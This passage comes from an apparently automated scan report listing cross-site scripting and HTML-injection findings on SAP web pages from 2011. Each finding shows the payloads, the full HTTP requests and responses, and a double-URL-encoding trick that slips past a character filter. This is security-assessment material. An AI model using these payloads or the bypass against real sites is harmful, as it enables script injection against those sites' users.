SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da
Expires: 0
Content-Length: 33749
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:35:09 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=sme; Path=/; secure

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
vRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut1d1c0"><a>a6b35360b1d" method="post" class="loginform" accept-charset="ISO-8859-1">
...[SNIP]...
3.130. https://www.sme.sap.com/irj/sme/cpslogon [SAMLRequest parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.sme.sap.com
Path:   /irj/sme/cpslogon

Issue detail

The value of the SAMLRequest request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74723"><a>f29ab74680 was submitted in the SAMLRequest parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /irj/sme/cpslogon?SAMLRequest=fZFRS8MwFIX%2FSsl7m2TtnIS1MBiDgkqx4oNvMb1jgTaJuanovzfNRCbiAnk5ued%2B55Atyml0YjeHk3mEtxkwZO2%2BJj37Pnm8POcALH8dYJOv%2Bc1ttWYbxaqSZM%2FgUVtTk1XBSNYiztAaDNKEKDEejSzn6ydeiXIlqvKFZPtI0EaG5DqF4FBQKpWyswlYoHSFshNdUq2oHhxFtH%2BeSXawXkEKXZOjHBEWeCcR9Tv8KB%2FTaFCkgjWZvRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D74723"><a>f29ab74680&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx

Response (redirected)

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da
Expires: 0
Content-Length: 33748
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:34:56 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=sme; Path=/; secure

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
q2oHhxFtH%2BeSXawXkEKXZOjHBEWeCcR9Tv8KB%2FTaFCkgjWZvRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D74723"><a>f29ab74680&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut" method="post" class="loginform" accept-charset="ISO-8859-1">
...[SNIP]...
3.131. https://www.sme.sap.com/irj/sme/cpslogon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.sme.sap.com
Path:   /irj/sme/cpslogon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45e84"><a>2f50f453e03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /irj/sme/cpslogon?SAMLRequest=fZFRS8MwFIX%2FSsl7m2TtnIS1MBiDgkqx4oNvMb1jgTaJuanovzfNRCbiAnk5ued%2B55Atyml0YjeHk3mEtxkwZO2%2BJj37Pnm8POcALH8dYJOv%2Bc1ttWYbxaqSZM%2FgUVtTk1XBSNYiztAaDNKEKDEejSzn6ydeiXIlqvKFZPtI0EaG5DqF4FBQKpWyswlYoHSFshNdUq2oHhxFtH%2BeSXawXkEKXZOjHBEWeCcR9Tv8KB%2FTaFCkgjWZvRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut&45e84"><a>2f50f453e03=1 HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx

Response (redirected)

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da
Expires: 0
Content-Length: 33752
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:35:23 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=sme; Path=/; secure

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
RFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut&45e84"><a>2f50f453e03=1" method="post" class="loginform" accept-charset="ISO-8859-1">
...[SNIP]...
3.132. https://www.sme.sap.com/irj/sme/logon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.sme.sap.com
Path:   /irj/sme/logon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7a93"><a>335e6fbb19b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/sme/logon?a7a93"><a>335e6fbb19b=1 HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; saplb_*=(J2EE3417600)3417650; Unique=QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==; PortalAlias=sme; JSESSIONID=(J2EE3417600)ID0819424750DB00193042231829069131End; SDNSTATE=526651564.14340.0000

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da
Expires: 0
Content-Length: 33788
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:34:19 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=sme; Path=/; secure

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<select onchange="location.href='/irj/sme/logon?a7a93"><a>335e6fbb19b=1&language='+document.forms['languageform'].elements[0].value">
...[SNIP]...
3.133. https://www.sme.sap.com/irj/sme/memberlogin [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.sme.sap.com
Path:   /irj/sme/memberlogin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcb60"><a>b8c345a2d48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/sme/memberlogin?dcb60"><a>b8c345a2d48=1 HTTP/1.1
Host: www.sme.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/606e87a0-0e29-2c10-7fbe-8c8c4607a1c4
Expires: 0
Date: Sat, 15 Oct 2011 15:05:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=sme; Path=/; secure
Content-Length: 33403

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<select onchange="location.href='/irj/sme/memberlogin?dcb60"><a>b8c345a2d48=1&language='+document.forms['languageform'].elements[0].value">
...[SNIP]...
3.134. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sap.com
Path:   /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6b04'%3balert(1)//13edec9a65 was submitted in the Referer HTTP header. This input was echoed as e6b04';alert(1)//13edec9a65 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=e6b04'%3balert(1)//13edec9a65
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore&ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:34:41 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:34:41 GMT; path=/
Set-Cookie: CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore&ExternalReferrerURL=http%3a%2f%2fwww.google.com%2fsearch%3fhl%3den%26q%3de6b04%27%3balert(1)%2f%2f13edec9a65; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:34:41 GMT; path=/
Set-Cookie: CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:34:40 GMT
Content-Length: 148683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script language="
...[SNIP]...
<script language="javascript" type="text/javascript">var T_T = 'PAGE';var T_L = 'Registration Page';var T_V = '';var T_C = 'CRM-US11-XEC-CS11TRIAL';var T_R='http://www.google.com/search?hl=en&q=e6b04';alert(1)//13edec9a65';TrackInteraction();</script>
...[SNIP]...
3.135. https://www.sap.com/sme/contactsap/index.epx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sap.com
Path:   /sme/contactsap/index.epx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd26d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85fde43dbf4c2d2df was submitted in the Referer HTTP header. This input was echoed as fd26d"><script>alert(1)</script>85fde43dbf4c2d2df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sme/contactsap/index.epx?renderableItem=%2Fshow%2F10 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Host: www.sap.com
Connection: Keep-Alive
Cache-Control: no-cache
Referer: http://www.google.com/search?hl=en&q=fd26d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85fde43dbf4c2d2df

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:27:37 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 16:27:37 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.google.com%2fsearch%3fhl%3den%26q%3dfd26d%252522%25253e%25253cscript%25253ealert%2525281%252529%25253c%25252fscript%25253e85fde43dbf4c2d2df; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:27:37 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:27:38 GMT
Content-Length: 87820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
<a href="/search?hl=en&q=fd26d"><script>alert(1)</script>85fde43dbf4c2d2df" onmouseover="window.status='Cancel';return true;" onmouseout="window.status='';return true;">
...[SNIP]...
3.136. https://www.sap.com/sme/contactsap/index.epx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sap.com
Path:   /sme/contactsap/index.epx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37f8e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed84849f1e63 was submitted in the Referer HTTP header. This input was echoed as 37f8e"><script>alert(1)</script>d84849f1e63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sme/contactsap/index.epx HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=37f8e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed84849f1e63
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
